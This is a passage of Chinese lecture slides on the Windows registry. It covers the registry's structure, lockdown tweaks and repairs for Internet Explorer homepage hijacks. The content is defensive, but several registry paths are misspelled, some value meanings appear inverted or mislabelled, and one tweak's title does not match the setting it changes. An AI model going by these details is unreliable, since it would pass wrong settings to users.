g)信息，如安裝硬件和設備驅(qū)動程序相關信息

USER.DAT是用來保持每個用戶特有信息，如桌面設置，墻紙和窗口顏色設置等。他們自備份文件為SYSTEM.DAO和。注冊表編輯器則是來對注冊表進行各種編輯工作。57BNCC第57頁注冊表結構系統(tǒng)對注冊表預定了六個主管鍵字：HKEY_CLASSES_ROOT：文件擴展名與應用關聯(lián)及OLE信息

HKEY_USERS：用戶依據(jù)個人興趣設置信息。HKEY_CURRENT_USER：當前登錄用戶控制面板選項和桌面等設置，以及映射網(wǎng)絡驅(qū)動器

HKEY_LOCAL_MACHINE：計算機硬件與應用程序信息

HKEY_DYN_DATA：即插即用和系統(tǒng)性能動態(tài)信息

HKEY_CURRENT_CONFIG：計算機硬件配置信息

58BNCC第58頁注冊表結構注冊表中鍵值項數(shù)據(jù)注冊表經(jīng)過鍵和子鍵來管理各種信息。不過注冊表中全部信息都是以各種形式鍵值項數(shù)據(jù)保留。在注冊表編輯器右窗格中顯示都是鍵值項數(shù)據(jù)。這些鍵值項數(shù)據(jù)能夠分為三種類型：

1.字符串值

在注冊表中，字符串值普通用來表示文件描述和硬件標識。通常由字母和數(shù)字組成，也能夠是漢字，最大長度不能超出255個字符。在本例中以"a"="***"表示。

59BNCC第59頁注冊表結構2.二進制值

在注冊表中二進制值是沒有長度限制，能夠是任意字節(jié)長。在注冊表編輯器中，二進制以十六進制方式表示。在本站中以"a"=hex:01,00,00,00方式表示。

3.DWORD值

DWORD值是一個32位(4個字節(jié))數(shù)值。在注冊表編輯器中也是以十六進制方式表示。在本站中以"a"=dword:00000001表示。60BNCC第60頁注冊表雙重入口問題

在注冊表中經(jīng)常出現(xiàn)雙重入口（分支），比如，有一些在HKEY_CLASSES_ROOT中鍵一樣會在HKEY_LOCAL_MACHINE中出現(xiàn)。注冊表中經(jīng)常出現(xiàn)雙重入口（分支），比如，有一些在HKEY_CLASSES_ROOT中鍵一樣會在HKEY_LOCAL_MACHINE中出現(xiàn)。

假如這些相同分支出現(xiàn)在兩個不一樣根鍵中，那么，哪個根鍵有效呢?

注冊表子鍵都有嚴格組織。一些相同信息會出現(xiàn)在超出一個子鍵中，假如您只修改了一個子鍵，那么該修改是否作用于系統(tǒng)依賴于該子鍵等級。普通來說，系統(tǒng)信息優(yōu)先于用戶等級。比如，一個設置項同時出現(xiàn)在HKEY_LOCAL_MACHINE和HKEY_USER子鍵中，通常由HKEY_LOCAL_MACHINE中數(shù)據(jù)起作用。要注意是，這種情況只發(fā)生在您直接編輯注冊表時。假如您從“控制面板”中更改系統(tǒng)配置，則全部出現(xiàn)該設置項地方均會發(fā)生對應改變。

61BNCC第61頁注冊表修改

一、直接修改注冊表基本方法對于熟悉注冊表項設置高級用戶，如果使用控制面板和策略文件不能達到目，也就只能采用這種最直接、最全面處理方法。具體使用方法是Regedit.exe(注冊表編輯器)到本地硬盤上運行，去掉注冊表只讀方式，對系統(tǒng)注冊表項進行修改，完成后應存盤退出。下次系統(tǒng)啟動時，新設置就會生效。

62BNCC第62頁注冊表修改二、間接修改注冊表簡易方法在注冊表文本文件首行必須用命令字符串“REGEDIT”，其作用是通知系統(tǒng)調(diào)用regedit來完成注冊信息合并工作。接下來每一行或代表一個鍵值聲明或者為注釋性說明信息。主鍵及其默認鍵值聲明格式為：根鍵\一級主鍵\二級主鍵\=默認鍵值63BNCC第63頁注冊表修改

三、備份注冊表方法不少安裝程序(或你自己直接處理)都可能搞亂你系統(tǒng)注冊表，從而引發(fā)不測，所以我們應該定期地備份user.dat和system.dat文件。但目前資源管理器(或者是DOS來)都不能直接復制這兩個文件.64BNCC第64頁注冊表安全實例1、讓用戶名不出現(xiàn)在登錄框中

Win9x以上操作系統(tǒng)能夠?qū)σ郧坝脩舻卿浶畔⒑杏洃浌π?，下次重新開啟計算機時，我們會在用戶名欄中發(fā)覺上次用戶登錄名，這個信息可能會被一些非法分子利用，而給用戶造成威脅，為此我們有必要隱藏上機用戶登錄名字。設置時，請用鼠標依次訪問鍵值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon，并在右邊窗口中新建字符串"DontDisplayLastUserName",并把該值設置為"1"，設置完后，重新開啟計算機就能夠隱藏上機用戶登錄名字。

65BNCC第65頁注冊表安全實例2、抵抗BackDoor破壞

當前，網(wǎng)上有許多流行黑客程序，它們能夠?qū)φ麄€計算機系統(tǒng)造成了極大安全威脅，其中有一個名叫BackDoor后門程序，專門揀系統(tǒng)漏洞進行攻擊。為預防這種程序?qū)ο到y(tǒng)造成破壞，我們有必要經(jīng)過對應設置來預防BackDoor對系統(tǒng)破壞。設置時，在編輯器操作窗口中用鼠標依次單擊鍵值HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run，假如在右邊窗口中如發(fā)覺了“Notepad”鍵值，就將它刪除，這么就能到達預防目標了。

66BNCC第66頁注冊表安全實例3、不允許使用“控制面板”

控制面板是Windows系統(tǒng)控制中心，能夠?qū)υO備屬性，文件系統(tǒng)，安全口令等很多系統(tǒng)很關鍵東西進行修改，我們當然需要防范這些了。

在隱藏和禁止使用“控制面板”時，我們能夠在開始菜單中運行欄中輸入regedit命令，打開注冊表編輯器操作界面，然后在該界面中，依次用鼠標單擊\\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\鍵值，并在其中新建DWORD值NoDispCPL，把值修改為1（十六進制）就行了。

67BNCC第67頁注冊表安全實例4、拒絕經(jīng)過網(wǎng)絡訪問軟盤

為了預防病毒入侵整個網(wǎng)絡，造成整個網(wǎng)絡處于癱瘓狀態(tài)，所以我們必須嚴格管理計算機輸入設備，以斷絕病毒源頭，為此就要禁止經(jīng)過網(wǎng)絡訪問軟盤。設置時，首先單擊開始按鈕，從彈出菜單中選擇運行命令；隨即，程序?qū)棾鲆粋€運行對話框，在該對話框中輸入regedit命令，然后在打開注冊表編輯器中依次打開鍵值[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon]，在右邊窗口中看看有沒有鍵值AllocateFloppies，假如沒有請創(chuàng)建DWORD值，名字取為AllocateFloppies，把它值修改為０或１，其中0代表可被域內(nèi)全部管理員訪問，1代表僅可被當?shù)氐顷懻咴L問。68BNCC第68頁注冊表安全實例5、讓“文件系統(tǒng)”菜單在系統(tǒng)屬性中消失

為了預防非法用戶隨意篡改系統(tǒng)中文件，我們有必要把“系統(tǒng)屬性”中“文件系統(tǒng)”菜單隱藏起來。隱藏時，只要在注冊表編輯器中用鼠標依次打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System鍵值，在右邊窗口中新建一個DWORD串值：“NoFileSysPage”，然后把它值改為“1”即可。

69BNCC第69頁注冊表安全實例6、鎖定桌面

桌面設置包含壁紙、圖標以及快捷方式，它們設置普通都是我們經(jīng)過精心選擇才設定好。大多數(shù)情況下，我們不希望他人隨意修改桌面設置或隨意刪除快捷方式。怎么辦?其實修改注冊表能夠幫我們鎖定桌面，這里“鎖定”含義是對他人修改不做儲存，不論他人怎么改，只要重新開啟計算機，我們設置就會原封不動地出現(xiàn)在眼前。設置時，運行regedit進入注冊表編輯器，找到以下分支：Hkey－Users\Software\Microsoft\Windows\CurentVersion\Polioies\Explores，并用鼠標雙擊“NoSaveSetting”，并將其鍵值從0改為1就OK了！

70BNCC第70頁注冊表安全實例7、禁用Regedit命令

注冊表對于很多用戶來說是很危險，尤其是初學者，為了安全，最好還是禁止注冊表編輯器regedit.exe運行，在公共機房愈加主要，不然自己機器一不小心就被改得一塌糊涂了。

修改注冊表時，首先運行regedit進入注冊表編輯器操作界面，在該界面中用鼠標依次單擊HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\鍵值，在右邊窗口中假如發(fā)覺Policies下面沒有System主鍵，則請在它下面新建一個主鍵，取名System，然后在右邊空白處新建一個DWORD串值，名字取為DisableRegistryTools，把它值修改為1，這么修改以后，使用這個計算機人都無法再運行regedit.exe來修改注冊表了。

71BNCC第71頁注冊表安全實例8、禁止修改“開始”菜單

普通，用戶開啟某一個程序時往往會在開始菜單下面程序組中尋找需要程序，假如我們隨意更改開始菜單中內(nèi)容，可能會影響其它用戶打開程序，所以我們經(jīng)常需要禁止修改“開始”菜單中內(nèi)容。在設置這個內(nèi)容時，我們能夠用鼠標在注冊表編輯器窗口中依次單擊以下鍵值：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explore，接著在右邊窗口中新建一個DWORD串值：“NoChangeStartMenu”，并把它值設置為“1”。72BNCC第72頁注冊表安全實例9、讓用戶只使用指定程序

為預防用戶非法運行或者修改程序，造成整個計算機系統(tǒng)處于混亂狀態(tài)，我們能夠經(jīng)過修改注冊表來到達讓用戶只能使用指定程序目標，從而確保系統(tǒng)安全。設置時，能夠在注冊表編輯器窗口中依次打開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer鍵值，然后在右邊窗口中新建一個DWORD串值，名字取為“RestrictRun”，把它值設為“1”。然后在RestrictRun主鍵下分別添加名為“1”、“2”、“3”等字符串值，然后將“1”，“2”、“3”等字符串值設置為我們允許用戶使用程序名。比如將“1”、“2”、“3”分別設置為word.EXE、notepad.EXE、write.EXE，則用戶只能使用word、記事本、寫字板了，這么我們系統(tǒng)將會做到最大保障，也能夠限制用戶運行無須要軟件了。

73BNCC第73頁注冊表安全實例10、預防WinNuke破壞

現(xiàn)在有一個叫WinNuke程序，能對計算機中Windows系統(tǒng)有破壞作用，為預防該程序破壞Windows操作系統(tǒng)，造成整個計算機系統(tǒng)癱瘓，所以我們有必要預防WinNuke破壞性。我們能夠在注冊表中對其進行設置，以確保系統(tǒng)安全。設置時，在編輯器操作窗口中用鼠標依次單擊鍵值HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP，然后在右邊窗口中新建或修改字符串“BSDUrgent”，并把其值設置為0，這么就能夠預防WinNuke對系統(tǒng)破壞了。

74BNCC第74頁注冊表安全實例11、禁用"任務欄屬性"功效

任務欄屬性功效，能夠方便用戶對開始菜單進行修改，能夠修改Windows系統(tǒng)很多屬性和運行程序，這在我們看來是件很危險事情，所以有必要禁止對它修改。

修改設置時，首先運行regedit進入注冊表編輯器，找到以下分支HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，在右窗格內(nèi)新建一個DWORD串值"NoSetTaskBar"，然后雙擊"NoSetTaskBar"鍵值，在彈出對話框"鍵值"框內(nèi)輸入1，就能夠到達禁用"任務欄屬性"功效了。

75BNCC第75頁注冊表安全實例12、禁止修改顯示屬性

有許多用戶為了使自己使用電腦外觀設置變得更漂亮一點，方便能表達出個性化格調(diào)，往往經(jīng)過修改顯示屬性到達更改外觀目標。但在實踐操作中，我們有時要確保全部計算機設置都必須相同，以方便同時教學，這時我們就需要禁止修改顯示屬性了。修改時，能夠用鼠標依次打開以下分支：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System，接著在右邊窗口中新建一個DOWRD串值：然后將“新值#1”更名為“NoDispCPL”，并將其值設為“1”就能夠了。

76BNCC第76頁注冊表安全實例13、隱藏“網(wǎng)上鄰居”

在局域網(wǎng)中，我們經(jīng)常能夠經(jīng)過網(wǎng)上鄰居來訪問別計算機上內(nèi)容，從而實現(xiàn)了資源共享目標。但有時網(wǎng)上鄰居會給我們造成安全上隱患，比如有不懷好意用戶能夠利用網(wǎng)上鄰居來非法刪除其它計算機上主要數(shù)據(jù)，給其它計算機造成了損失。為了防止這么損失，我們能夠利用注冊表來隱藏“網(wǎng)上鄰居”。設置時，請用鼠標依次訪問鍵值HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer，接著在右邊窗口中新建DWORD值NoNetHood，并把該值設置為1（十六進制）。

77BNCC第77頁注冊表安全實例14、禁止屏幕保護使用密碼

在公眾場所下使用電腦，最忌諱是用戶隨意設置系統(tǒng)密碼，因為一旦某個用戶設置了密碼后，其它用戶就不能正常使用，嚴重能使計算機無法開啟。為了防止這些現(xiàn)象發(fā)生，我們有必要限制用戶使用帶有密碼屏幕保護。設置時，首先運行regedit命令打開注冊表編輯器窗口，然后在該窗口中依次單擊以下鍵值：CURRENT_USER\ControlPanel\desktop\ScreenSaveUsePassword，接著修改ScreenSaveUsePassword值，假如把該值設置為0，表示為屏幕保護不設密碼，假如設置為1則使用預設密碼，我們依據(jù)自己需要設置就行了。

78BNCC第78頁注冊表安全實例屏蔽工作組信息HKEY_CURRENT_USER\Software\Windows\CurrentVersion\Policies\NetworkNoNetSetupIDPage雙字節(jié)1去掉訪問控制選項HKEY_CURRENT_USER\Software\Windows\CurrentVersion\Policies\NetworkNoNetSetupSecurityPage雙字節(jié)179BNCC第79頁注冊表安全實例隱藏一個服務器

1、打開注冊表編輯器，并在編輯器對話框中用鼠標依次單擊以下分支：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters鍵值。

2、用鼠標單擊該鍵值下面Hidden數(shù)值名稱，假如未發(fā)覺此名稱，那么添加一個，其數(shù)據(jù)類型為REG_DWORD。

3、接著用鼠標雙擊此項，在彈出“DWORD編輯器”對話框中輸入1即可。

4、最終單擊“確定”按鈕，并退出注冊表編輯窗口，重新開啟計算機就能夠在局域網(wǎng)中隱藏一個服務器了。

80BNCC第80頁注冊表安全實例不允許用戶撥號訪問

假如用戶計算機上面有主要信息，有可能不允許其它人隨便訪問。那么怎樣禁止其它人撥入訪問你計算機，降低安全隱患呢，詳細步驟為：

1、打開注冊表編輯器，并在編輯器中依次展開以下鍵值：

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Network]；

2、在編輯器右邊列表中用鼠標選擇“NoDialIn”鍵值，假如沒有該鍵值，必須新建一個DWORD值，名稱設置為“NoDialIn”；

3、接著用鼠標雙擊“NoDialIn”鍵值，編輯器就會彈出一個名為“字符串編輯器”對話框，在該對話框文本欄中輸入數(shù)值“1”，其中0代表禁止撥入訪問功效，1代表允許撥入訪問功效；

4、退出后重新登錄網(wǎng)絡，上述設置就會起作用。81BNCC第81頁注冊表安全實例限制使用系統(tǒng)一些特征

1、運行注冊表編輯器，進入HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System鍵值；

2、假如不存在該鍵值，就新建一個；

3、然后將該鍵值下方DisableTaskManager值設為1，表示將阻止用戶運行任務管理器。

4、接著將NoDispAppearancePage設為1，表示將不允許用戶在控制面板中改變顯示模式；

5、下面再將NoDispBackgroundPage設為1，表示將不允許用戶改變桌面背景和墻紙。

82BNCC第82頁注冊表安全實例將文件系統(tǒng)設置為NTFS格式

1、打開注冊表編輯器，并在編輯器中依次展開以下鍵值：

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem；

2、在注冊表編輯器中用鼠標單擊“編輯”菜單，并在下拉菜單中選擇“新建”菜單項，并在其彈出子菜單中單擊“DWORD值”；

3、在編輯器右邊列表中輸入DWORD值名稱為“NtfsDisableLastAccessUpdate”；

4、接著用鼠標雙擊NtfsDisableLastAccessUpdate鍵值，編輯器就會彈出一個名為“字符串編輯器”對話框，在該對話框文本欄中輸入數(shù)值“1”，其中0代表“取消”該項功效，1代表“啟用”該項功效。

83BNCC第83頁主頁被改

1、IE默認連接首頁被修改IE瀏覽器上方標題欄被改成“歡迎訪問……網(wǎng)站”樣式，這是最常見篡改伎倆，受害者眾多。受到更改注冊表項目為：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main\StartPageHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main\StartPage

84BNCC第84頁主頁被改

處理方法：①在Windows開啟后，點擊“開始”→“運行”菜單項，在“打開”欄中鍵入regedit，然后按“確定”鍵；②展開注冊表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main下，在右半部分窗口中找到串值“StartPage”雙擊，將StartPage鍵值改為“about:blank”即可；③同理，展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main在右半部分窗口中找到串值“StartPage”，然后按②中所述方法處理。

85BNCC第85頁主頁被改特殊例子：當IE起始頁變成了一些網(wǎng)址后，就算你經(jīng)過選項設置修改好了，重啟以后又會變成他們網(wǎng)址啦，十分難纏。其實他們是在你機器里加了一個自運行程序，它會在系統(tǒng)開啟時將你IE起始頁設成他們網(wǎng)站。

處理方法：運行注冊表編輯器regedit.exe，然后依次展開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run主鍵，然后將其下registry.exe子鍵刪除，然后刪除自運行程序c:\ProgramFiles\registry.exe，最終從IE選項中重新設置起始頁就好了。86BNCC第86頁主頁被改2、篡改IE默認頁有些IE被改了起始頁后，即使設置了“使用默認頁”依然無效，這是因為IE起始頁默認頁也被篡改啦。詳細說來就是以下注冊表項被修改：HKEY_LOCAL_MACHINE\Software\Microsoft\InternetExplorer\

Main\Default_Page_URL“Default_Page_URL”這個子鍵鍵值即起始頁默認頁。

處理方法：運行注冊表編輯器，然后展開上述子鍵，將“Default_Page_UR”子鍵鍵值中那些篡改網(wǎng)站網(wǎng)址改掉就好了，或者設置為IE默認值。

87BNCC第87頁主頁被改主要是修改了注冊表中IE設置下面這些鍵值(DWORD值為1時為不可選)：[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"Settings"=dword:1[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"Links"=dword:1[HKEY_CURRENT_USER\Software\Policies\Microsoft\

InternetExplorer\ControlPanel]

"SecAddSites"=dword:1

處理方法：將上面這些DWORD值改為“0”即可恢復功效。

88BNCC第88頁主頁被改

4、IE默認首頁灰色按扭不可選這是因為注冊表HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\

InternetExplorer\ControlPanel下DWORD值“homepage”鍵值被修改緣故。原來鍵值為“0”，被修改為“1”（即為灰色不可選狀態(tài)）。

處理方法：將“homepage”鍵值改為“0”即可89BNCC第89頁主頁被改5、IE標題欄被修改在系統(tǒng)默認狀態(tài)下，是由應用程序本身來提供標題欄信息，但也允許用戶自行在上述注冊表項目中填加信息，而一些惡意網(wǎng)站正是利用了這一點來得逞：它們將串值WindowTitle下鍵值改為其網(wǎng)站名或更多廣告信息，從而到達改變?yōu)g覽者IE標題欄目標。詳細說來受到更改注冊表項目為：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\

Main\WindowTitleHKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\

Main\WindowTitle

90BNCC第90頁主頁被改處理方法：①在Windows開啟后，點擊“開始”→“運行”菜單項，在“打開”欄中鍵入regedit，然后按“確定”鍵；

②展開注冊表到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\InternetExplorer\Main下，在右半部分窗口中找到串值“WindowTitle”，將該串值刪除即可，或?qū)indowTitle鍵值改為“IE瀏覽器”等你喜歡名字；③同理，展開注冊表到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\Main然后按②中所述方法處理。91BNCC第91頁主頁被改

6、IE右鍵菜單被修改受到修改注冊表項目為：HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\MenuExt下被新建了網(wǎng)頁廣告信息，并由此在IE右鍵菜單中出現(xiàn)！

92BNCC第92頁主頁被改處理方法：打開注冊標編輯器，找到HKEY_CURRENT_USER\Software\Microsoft\InternetExplorer\MenuExt刪除相關廣告條文即可，注意不要把下載軟件FlashGet和Netants也刪除掉啊，這兩個可是“正?！毖?，除非你不想在IE右鍵菜單中見到它們。93BNCC第93頁主頁被改7、IE默認搜索引擎被修改在IE瀏覽器工